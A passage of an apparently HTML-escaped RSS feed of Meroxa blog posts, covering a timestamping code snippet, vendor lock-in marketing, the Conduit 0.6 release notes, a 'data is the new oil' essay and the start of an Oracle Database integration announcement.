            payload &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;value&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

            &lt;span class=&quot;token comment&quot;&gt;# Prepend timestamp to each log line&lt;/span&gt;
            log_line &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; payload&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;log_line&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
            current_timestamp &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; datetime&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;datetime&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;now&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;strftime&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;%Y-%m-%d %H:%M:%S&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            payload&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;log_line_with_timestamp&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;&lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;current_timestamp&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt; &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;log_line&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;except&lt;/span&gt; Exception &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; e&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Error occurred while parsing records: &quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;str&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;These are just two examples of how Meroxa makes it effortless to work with Confluent data streams using various languages. The possibilities are vast, limited only by your imagination.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Meroxa brings the best practices of software development for data to any environment without bias. Meroxa’s unique and disruptive approach with code-first and infrastructure complexity abstraction has been shown to greatly speed up the value of Confluent with a significant reduction in investment and time - months to minutes. The one example provided was for Confluent, but the same would apply for other key components of your existing architecture: cloud or on-prem, data-in-motion, data lakes and migrations.&lt;/p&gt;
&lt;p&gt;To learn more about how Meroxa can help transform your data strategy, &lt;a href=&quot;https://meetings.hubspot.com/haller/demo&quot;&gt;schedule a call&lt;/a&gt; with our team of experts.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Liberate Your Data from Vendor Lock-in with Meroxa]]></title><description><![CDATA[Meroxa helps you liberate your company's data so you can avoid vendor lock-in.]]></description><link>https://meroxa.com/blog/liberate-your-data-with-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/liberate-your-data-with-meroxa</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Tue, 25 Apr 2023 16:43:35 GMT</pubDate><content:encoded>&lt;p&gt;As modern enterprises migrate to the cloud, they are often faced with an overwhelming number of vendor choices. Unfortunately, some companies make this critical vendor decision based on the products and services needed at that moment. This myopic approach leads to vendor lock-in.&lt;/p&gt;
&lt;p&gt;Vendor lock-in is being stuck with a vendor that is no longer aligned with your goals and needs. &lt;a href=&quot;https://www.forbes.com/sites/forbestechcouncil/2022/07/01/how-vendor-lock-in-of-databases-hurts-an-entire-industry/?sh=6ff6a4ed445c&quot;&gt;Forbes&lt;/a&gt; puts it this way:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;“It essentially forces an organization to continue staying with a vendor, whether due to the exorbitant cost of switching providers or the potential interruption that could occur from a change.”&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;In this post, we’ll look at the risks associated with vendor lock-in along with possible options to avoid those risks. Finally, we’ll see how Meroxa’s stream processing data application platform can help break your data free from vendor lock-in.&lt;/p&gt;
&lt;h2&gt;The risks and consequences of vendor lock-in&lt;/h2&gt;
&lt;p&gt;The pain of vendor lock-in becomes acute when your vendor cannot interact with your proprietary systems, open-source systems, or with those from another vendor. The negative outcomes of vendor lock-in may include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Mounting costs and erosion of your bargaining edge.&lt;/li&gt;
&lt;li&gt;Lack of flexibility to move to a different vendor, as the migration effort brings added cost, increased risk, and extended timelines.&lt;/li&gt;
&lt;li&gt;Reduced service levels, as a vendor experiences outages but has little incentive to provide a resolution.&lt;/li&gt;
&lt;li&gt;An incompatible tech stack, leading to difficulty in configuring free-flow systems.&lt;/li&gt;
&lt;li&gt;The risk of losing access to data, applications, and other resources, if the vendor goes out of business.&lt;/li&gt;
&lt;li&gt;The inability to leverage other vendors, which might offer better technology or pricing.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As we look at this extensive list of risks, we see the importance of carefully assessing the long-term implications of selecting the right vendor. How might an organization avoid these risks when it’s time to choose a vendor?&lt;/p&gt;
&lt;h2&gt;Avoid the risks of vendor lock-in&lt;/h2&gt;
&lt;p&gt;No organization intends to get stuck with a vendor and become forced to look for remediation measures later. To help guard against vendor lock-in at decision time, here are some key steps that enterprises can take:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;When evaluating vendors, prepare a list of key non-negotiable attributes, such as cost, performance, features, and upward/downward compatibility.&lt;/li&gt;
&lt;li&gt;Look for cloud services and platforms that use open standards and have broad industry support, making it easier to switch to another provider if needed.&lt;/li&gt;
&lt;li&gt;Choose service providers that make it easy to export and import data between providers.&lt;/li&gt;
&lt;li&gt;Review your cloud strategy regularly to evaluate whether your current provider continues to meet business needs.&lt;/li&gt;
&lt;li&gt;Negotiate for flexibility in contracts to allow for switching providers in the future, whenever possible.&lt;/li&gt;
&lt;li&gt;Prepare backup storage and computing resources for critical business processes, decoupling them from vendor-specific dependencies.&lt;/li&gt;
&lt;li&gt;Establish a fallback plan with a strategy to migrate quickly in case your vendor closes its doors. Put simply: Always be exit-ready.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These measures focus on taking the right action the first time, thereby ensuring that your data, applications, and other resources are portable and flexible. While the suggested steps can certainly alleviate the risks of cloud vendor lock-in, you have no guarantee of avoiding vendor lock-in completely.&lt;/p&gt;
&lt;p&gt;So what should organizations do if they are already locked in? What tools can help organizations liberate their applications and their data?&lt;/p&gt;
&lt;p&gt;It’s important to note that liberation doesn’t mean abandoning your existing vendor. Rather, we want to empower an organization by decoupling the business KPIs from vendor performance and becoming agile in the process.&lt;/p&gt;
&lt;p&gt;Meroxa is one such tool that solves the vendor lock-in problem. It allows organizations to utilize the best of the available products and services from multiple cloud providers while maintaining the free flow of data across the organization. Let’s look at how Meroxa does this.&lt;/p&gt;
&lt;h2&gt;How Meroxa liberates your data from vendor lock-in&lt;/h2&gt;
&lt;p&gt;Meroxa provides organizations with a unified and abstract view of their data—even as it’s stored in multiple cloud providers—thereby making it easier to move and manage data across different platforms.&lt;/p&gt;
&lt;p&gt;By providing services such as data integration, orchestration, and stream processing, Meroxa enables organizations to take control of their data without being tied to a single vendor. As an end-to-end platform, Meroxa enables easy access, security, and governance of data across multiple vendors.&lt;/p&gt;
&lt;p&gt;Among the tools and services provided by Meroxa, we’ll focus on Conduit and the Meroxa platform, both of which help organizations to move data among cloud platforms, bringing ease of switching between providers as needed.&lt;/p&gt;
&lt;h3&gt;Data integration with Conduit&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; is a low-level, open-source data streaming tool that helps developers move data across systems. Whether an organization needs to move data between databases, files, or APIs, Conduit supports all kinds of data motion. Conduit already ships with an extensive set of built-in connectors, but you can also write your own connectors—in any language—for custom data integrations.&lt;/p&gt;
&lt;p&gt;One common use case for Conduit is data migration from Apache Kafka to PostgreSQL, an effort that would otherwise require extensive development, testing, and troubleshooting.&lt;/p&gt;
&lt;h3&gt;Stream processing applications with the Meroxa platform&lt;/h3&gt;
&lt;p&gt;Meroxa is a platform as a service that enables developers to declaratively orchestrate end-to-end streaming data movement and processing via a programming language of their choice. All of the needed functionality is encapsulated in an application framework called &lt;a href=&quot;https://docs.meroxa.com/turbine/get-started/&quot;&gt;Turbine&lt;/a&gt;. Developers build, test, and deploy their Turbine applications to the Meroxa platform— and the platform takes care of the rest. The Turbine framework not only enables integration with popular tools and platforms, but it also supports the use of highly specialized tools, such as &lt;a href=&quot;https://meroxa.com/blog/real-time-fraud-detection-with-turbine-and-novelty-detector&quot;&gt;thatDot Novelty Detector&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let’s look at two typical use cases for Meroxa, seeing how it enables easy stream processing between two distinct systems.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka&quot;&gt;Streaming changes in real-time from MongoDB to Apache Kafka &lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Liberate%20Your%20Data%20from%20Vendor%20Lock-in%20with%20Meroxa%20-%20FINAL.png&quot; alt=&quot;Liberate Your Data from Vendor Lock-in with Meroxa - FINAL&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;A Change Data Capture (CDC) connector is created from the Meroxa platform and applied to a MongoDB Atlas-hosted database. That connector is used by a Turbine Stream Processing Data App that receives changes in real-time and publishes them as a stream. The Turbine library enables developers to write transformations on this stream, which then continues to a downstream Kafka cluster.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://meroxa.com/blog/sync-transform-migrate-data-in-real-time-from-postgresql-to-mongodb-w/-meroxa&quot;&gt;Real-time data migration and transformation from PostgreSQL to MongoDB &lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Liberate%20Your%20Data%20from%20Vendor%20Lock-in%20with%20Meroxa%20-%20FINAL-2.png&quot; alt=&quot;Liberate Your Data from Vendor Lock-in with Meroxa - FINAL-2&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;In this Turbine app, developers create a CDC connector and apply it to a PostgreSQL database to receive real-time updates and publish them in the form of a stream. The Turbine application can perform transformations as necessary and then subsequently stream this data to MongoDB in real-time.&lt;/p&gt;
&lt;p&gt;Following a &lt;a href=&quot;https://meroxa.com/blog/introducing-visualized-turbine-applications&quot;&gt;recent update&lt;/a&gt;, Meroxa has gone a step further to provide developers with real-time visualization tools, allowing them to see what’s happening behind the scenes in their deployed Turbine applications. Developers can see through dashboards and visualizations how data flows from sources through processing functions and on to destinations.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The risks associated with vendor lock-in often outweigh the benefit of simplicity that comes with using a single vendor. Organizations have long faced the consequences of vendor lock-in, and they see the value of taking the necessary steps to avoid being stuck with the wrong vendor for the job.&lt;/p&gt;
&lt;p&gt;In this post, we’ve highlighted the difficulty that comes with transitioning from a vendor when it no longer aligns well with your business or technological requirements. While we considered the steps you can take to minimize the risk, vendor lock-in is always a possibility.&lt;/p&gt;
&lt;p&gt;Fortunately, Meroxa provides enterprises with tools to liberate their data, decoupling that data from any specific vendor. Tools such as Conduit and Meroxa help with data integration, data movement, and data processing, within and across all cloud services and providers.&lt;/p&gt;
&lt;p&gt;To see how Meroxa can solve vendor lock-in concerns specific to your organization, &lt;a href=&quot;https://meetings.hubspot.com/haller/demo&quot;&gt;schedule a call&lt;/a&gt; with our experts.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introducing Conduit 0.6]]></title><description><![CDATA[Conduit 0.6, is full of features and bug fixes that will help developers as they operate Conduit in production environments.]]></description><link>https://meroxa.com/blog/conduit-0.6</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.6</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Tue, 11 Apr 2023 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;With Conduit 0.6, we’re inching closer to the 1.0 release. Conduit is an important building block in the Meroxa platform to stream data from and to a variety of data stores. Starting with Conduit 0.5, we’ve made a concerted effort to focus on features and bug fixes that help developers as they operate Conduit in production environments. This is true for the Meroxa platform and those that use Conduit today.&lt;/p&gt;
&lt;h2&gt;Significant Features&lt;/h2&gt;
&lt;h3&gt;More ways to install Conduit&lt;/h3&gt;
&lt;p&gt;Let’s face it. There’s so many different ways a Developer or a DevOps team wants to install software on their machines or in a production environment. That’s why all of our releases starting with 0.6 will have the ability to be installed via:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit#homebrew&quot;&gt;Homebrew&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit#rpm&quot;&gt;RPM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit#debian&quot;&gt;Debian Packages&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Connector Lifecycle Events&lt;/h3&gt;
&lt;p&gt;Before Conduit 0.6, if you wanted to build a Conduit connector, the connector needed to be able to respond to a handful of events from Conduit itself, `Configure`, `Open`, `Read`, `Write`, `Ack`, or `Teardown`. These events would get emitted to the connector through the invocation of a pipeline. At first, these events seem more than enough to cover the needs of various data stores and ways to connect to them. In practice, these weren’t enough to cover extra actions that a connector might want to take. Let’s say you wrote a Change Data Capture connector for Postgres. In this connector you need to open a replication slot on the database and close the slot when you’re done streaming data. With the new lifecycle events, you could open the replication slot in a Source `OnCreate` event and when the connector shuts down you can close the slot in the Source `OnDelete` event.&lt;/p&gt;
&lt;p&gt;In Conduit 0.6, we’ve introduced a few more events throughout the connector’s lifecycle. These events include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Source &lt;code class=&quot;language-text&quot;&gt;OnCreate&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Source &lt;code class=&quot;language-text&quot;&gt;OnUpdate&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Source &lt;code class=&quot;language-text&quot;&gt;OnDelete&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Destination &lt;code class=&quot;language-text&quot;&gt;OnCreate&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Destination &lt;code class=&quot;language-text&quot;&gt;OnUpdate&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Destination &lt;code class=&quot;language-text&quot;&gt;OnDelete&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With these extra events, you’ll now be able to have more control over when and what your connector does when Conduit includes it in a pipeline. If you want more information about it, check the original &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/design-documents/20230228-connector-lifecycle-methods.md&quot;&gt;Design Doc&lt;/a&gt; and the &lt;a href=&quot;https://github.com/ConduitIO/conduit/pull/954&quot;&gt;associated&lt;/a&gt; &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues/810&quot;&gt;issues&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Parallel Processors&lt;/h3&gt;
&lt;p&gt;In Conduit Pipelines when you wanted to add a processor, that processor would sequentially process records as they’re pulled from the upstream data source. With the release of Parallel Processors, you now have the ability to specify a number of workers and Conduit will process incoming records across the processor workers. This allows processors to keep up with high data velocity pipelines. Keep in mind that for the data coming into the processor the data may get processed by processor workers out of order but the records will flow out of the processor in the order that they came in.&lt;/p&gt;
&lt;p&gt;To kick the tires on this, you’ll need to include the number of `workers` you want in your pipeline configuration file:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.0&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; pipeline1
    &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; proc1
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; js
        &lt;span class=&quot;token key atrule&quot;&gt;workers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you don’t include `workers` in your processor definition, the default will be `1`.&lt;/p&gt;
&lt;p&gt;To learn more about Parallel Processors, go &lt;a href=&quot;https://github.com/ConduitIO/conduit/pull/744&quot;&gt;check out the PR&lt;/a&gt;!&lt;/p&gt;
&lt;h2&gt;Looking forward to 1.0&lt;/h2&gt;
&lt;p&gt;One of our main principles on the Conduit team is to make sure that what we say Conduit does is actually what you get. This is why we’ve been so focused on making sure operating Conduit is as expected. In terms of feature development, we want 1.0 to signify that Conduit won’t have any major breaking changes. This provides guarantees around how you can expect to interface with and develop against Conduit. As of this time, we don’t expect any major breaking changes to the internal APIs of Conduit and the connector spec. Once we spend more time with Conduit in Meroxa’s production environment, we’ll be able to gather the information we need to know if those APIs will need to change.&lt;/p&gt;
&lt;p&gt;So what does the next set of capabilities and features look like? We’re diligently working on a Conduit Kubernetes Operator. For advanced production environments, this will make running a Conduit service that much easier with all of the needed behaviors around starting, stopping, and restarting pipelines all built-in. But that’s just one of the many capabilities we’re looking to add before we get to 1.0, check out all of the &lt;a href=&quot;https://github.com/ConduitIO/conduit/milestones?with_issues=no&quot;&gt;milestones&lt;/a&gt; in GitHub for more information.&lt;/p&gt;
&lt;h2&gt;We’d love your feedback too!&lt;/h2&gt;
&lt;p&gt;As we start gearing up for 1.0, we’d love to get your feedback! If you want to see the full list of what was included in this release, check out the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.6.0&quot;&gt;Conduit Changelog&lt;/a&gt; and the &lt;a href=&quot;https://docs.conduit.io/docs/introduction/getting-started/&quot;&gt;documentation&lt;/a&gt;. Also, feel free to join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[If Data is the New Oil, Why isn't Data a Commodity?]]></title><description><![CDATA[Because of Meroxa's revolutionary code-first strategy, Meroxa is the only independent streaming integration provider that frees you from vendor lock-in.]]></description><link>https://meroxa.com/blog/why-isnt-data-a-commodity</link><guid isPermaLink="false">https://meroxa.com/blog/why-isnt-data-a-commodity</guid><dc:creator><![CDATA[Keith Haller]]></dc:creator><pubDate>Fri, 17 Mar 2023 00:36:45 GMT</pubDate><content:encoded>&lt;p&gt;If you drive a Tesla or any other electric vehicle, you realize the cost and limitations when a utility such as electricity is not available as a commodity. Electric vehicle owners today are limited to only having access to electricity from a single proprietary delivery platform. As a result, electric vehicle owners spend more money to access what should be a commodity.&lt;/p&gt;
&lt;p&gt;Similarly, cloud storage was supposed to be a utility, but it has the same proprietary access with limited integrations. Cloud vendors today allow access to data, as long as it&apos;s stored or accessed from their cloud, requiring users to exclusively use their cloud services. As a result, very few companies enjoy the benefits of multi-cloud and are locked into using a single cloud provider. We know this is true due to the increasing number of Chief Cloud Economist roles being established to oversee the costs associated with cloud services.&lt;/p&gt;
&lt;p&gt;What should be a commodity like oil is instead locking customers into high prices, and ultimately limiting potential for innovation and a multi-cloud enterprise strategy. Cloud data storage itself is not proprietary, but since the integrations built to support that cloud storage is proprietary, data cannot be a commodity and is therefore nothing like oil.&lt;/p&gt;
&lt;h3&gt;So how do cloud platform vendors have you over the barrel?&lt;/h3&gt;
&lt;p&gt;Cloud vendors have you tied to their platform, simply because all the integrations to that data are customized, limited, and proprietary to only their cloud platform. You may want to purchase another cloud vendor, but you can’t because the integration stack only works for their cloud.&lt;/p&gt;
&lt;p&gt;Unfortunately, cloud storage vendors will never provide multi-cloud integrations, making it challenging for customers to compare and choose a storage provider based on features and price. Cloud vendors don’t want multi-cloud environments, because having proprietary rights to your data gives them an advantage by locking you in, resulting in a premium to you. It has been and always will be this way. It would be unwise to assume anything different. Additionally, cloud vendors even penalize you for switching/migrating data to another platform.&lt;/p&gt;
&lt;p&gt;The cloud lock-in becomes painfully apparent when your Cloud Utility bill reaches millions of dollars, and there becomes a need to develop new skills within the organization for cloud accounting.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Is%20Data%20the%20New%20Oil%20Blog%20Image%201.png&quot; alt=&quot;Top Cloud Challenges from Flexera&quot;&gt;&lt;/p&gt;
&lt;p&gt;Source: &lt;a href=&quot;https://www.infoworld.com/article/3689813/cloud-trends-2023-cost-management-surpasses-security-as-top-priority.html&quot;&gt;https://www.infoworld.com/article/3689813/cloud-trends-2023-cost-management-surpasses-security-as-top-priority.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;In order for cloud storage to truly be as valuable as oil, you have to have a multi-cloud strategy from a neutral third-party vendor.&lt;/p&gt;
&lt;h3&gt;What is an example of a successful third-party vendor and how will that change in the next 3 years?&lt;/h3&gt;
&lt;p&gt;Informatica is a good example of a neutral 3rd party vendor that enabled uniform integration with multiple data stores. Before Informatica became an enterprise leader in ETL, the Relational Database Management System (RDBMS) vendors (i.e. Oracle, Sybase) provided their own ETL tool that was customized for only their RDBMS. Customers gained tremendously by using a neutral third-party vendor such as Informatica, which allowed standardization of data integrations across all RDBMS. Informatica enabled data became more of a commodity across storage platforms. Similarly, today, data needs to become more of a commodity across clouds and data lakes.&lt;/p&gt;
&lt;h3&gt;The actual cost of proprietary single cloud storage is the loss of competitive advantage to companies that transition from “platform-led” to “developer-led” discovery.&lt;/h3&gt;
&lt;p&gt;If you overspend on cloud resources because you have no choice and all your integrations are proprietary, you will have to resort to only looking at data that is absolutely needed. That has always been the downside of a “platform-led” approach to discovery. The cost of cloud will limit your ability to experiment with and explore new data. All the data that your business users suspect might be valuable but aren’t sure about because it’s too expensive to evaluate, will be left behind. However, companies that transition to “developer-led” will figure out how to make the cloud a utility, and can then afford discovery and exploration. They will have tools that enable a top-down, “developer-led” flexible approach to triaging data.&lt;/p&gt;
&lt;p&gt;Meanwhile, your company will unfortunately be stuck with a lock-and-load “platform-led” approach with a single cloud vendor that performs queries at incredible speeds, but also at incredible costs and rigidity. There has always been too much emphasis on optimizing the vendor platform per known queries and not enough focus on supporting discovery and exploration. Data platforms have never focused on new data that business users might find valuable. This “platform-led” approach never afforded the luxury of storing everything that anybody thought might be valuable and then hoping for the best. To remain competitive, companies need to change how they approach data discovery and exploration. Modern data architectures will have to move towards a more flexible and open “developer-led” approach that allows for experimentation and discovery.&lt;/p&gt;
&lt;p&gt;The innovations needed will occur at the front-end of integration with the business user, not at the storage end. This will be explored further in my next blog.&lt;/p&gt;
&lt;h3&gt;How do you create a neutral data integration strategy that is not biased toward a single cloud or even toward a cloud at all?&lt;/h3&gt;
&lt;p&gt;Enabling a multi-cloud design and reducing cloud costs doesn’t need to be difficult. Using the right tool that gives you the flexibility to work with your data regardless of where it lives can help you create a neutral data integration strategy. At Meroxa, we offer a code-first approach to data integration, resulting in cloud neutrality and making data a commodity just like oil.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What makes Meroxa different than other platforms:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Code-First - Developers of any skill level can build data products in the language of their choice with the ultimate flexibility that code provides. Companies do not need subject matter experts to work with their data. In just &lt;a href=&quot;https://meroxa.com/blog/real-time-data-streaming-from-postgresql-to-kafka-4-lines-of-code-w/-cdc/&quot;&gt;4 lines of code&lt;/a&gt; you can move data around like a commodity, to and from any cloud vendor.&lt;/li&gt;
&lt;li&gt;Open-Source - Built on open-source technology this gives enterprises the security and flexibility they need. No vendor lock-in &amp;#x26; connectors for any data store (databases, cloud, SaaS apps, APIs, data lakes, and messaging systems) make it simple for organizations to readily access that data and work with it. Reliable production-ready connectors for any data can be built in warp speed using our open-source libraries.&lt;/li&gt;
&lt;li&gt;Easily manage hundreds of integrations - Meroxa automatically creates a shared data stream catalog and embeds it into your workflows so you can search, find, and reuse data streams effortlessly across all the programming languages. Building scalable and reusable development artifacts across clouds, programming languages and projects makes developing with data significantly faster than traditional approaches.&lt;/li&gt;
&lt;li&gt;Build, Test, Iterate, Deploy - Build your stream processing application using a language of your choice, test with data samples that reflect your production environment, iterate as many times as needed, and then deploy your application, ultimately reaching business conclusions quicker with minimal effort and resources.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Is%20Data%20the%20New%20Oil%20Blog%20Image%202.png&quot; alt=&quot;Diagram illustrating how easy Meroxa makes it to build, test, iterate, and deploy.&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa is the only independent streaming integration vendor critical to be able to treat data like oil, because we have a unique and disruptive code-first approach.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;“You can manage the cloud vendors, or they will manage you. Meroxa gives you that with just 4 lines of code.”&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Meroxa can help turn your data into a commodity. Companies that realize the value of a &quot;developer-led&quot; vs. “platform-led” data strategy can quickly reduce their cloud costs and achieve a multi-cloud environment. With Meroxa being the only independent streaming integration platform able to treat data like a commodity, our customers have been able to realize tremendous value. To learn more about how Meroxa can help transform your data strategy, &lt;a href=&quot;https://landing.meroxa.com/demo_request&quot;&gt;schedule a demo&lt;/a&gt; today.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Announcing the Oracle Database Source Data Integration]]></title><description><![CDATA[Ingest, transform & stream data from your Oracle Database with Meroxa in a few lines of code.]]></description><link>https://meroxa.com/blog/oracle-database-data-integration</link><guid isPermaLink="false">https://meroxa.com/blog/oracle-database-data-integration</guid><dc:creator><![CDATA[Sara Menefee]]></dc:creator><pubDate>Wed, 15 Mar 2023 14:57:44 GMT</pubDate><content:encoded>&lt;p&gt;We are excited to announce that the Meroxa Platform now supports data integrations for Oracle Databases.&lt;/p&gt;
&lt;p&gt;Oracle Database, also known as Oracle or Oracle DB, is a relational database management system (RDBMS) developed by &lt;a href=&quot;https://www.oracle.com/corporate/&quot;&gt;Oracle Corporation&lt;/a&gt;. It is one of the most widely used databases in the world by large enterprise companies that require robust and dependable database solutions to store, process, and access data at a massive scale.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Oracle Database as a Source&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa&apos;s Turbine application framework lets you write code naturally by using Meroxa Functions to alter incoming data records and events from an Oracle Database source data stream before arriving at any downstream destinations, whether another database or system. The Turbine application framework supports programming languages such as JavaScript, Python, Ruby, and Go.&lt;/p&gt;
&lt;p&gt;When you deploy a Turbine streaming application with an Oracle Database source, the Meroxa Platform takes an initial snapshot of the source table. Once the snapshot is complete, it begins tracking new data records and events, including &lt;strong&gt;INSERT&lt;/strong&gt;, &lt;strong&gt;UPDATE&lt;/strong&gt;, and &lt;strong&gt;DELETE&lt;/strong&gt; operations, and pushes them into the data stream.&lt;/p&gt;
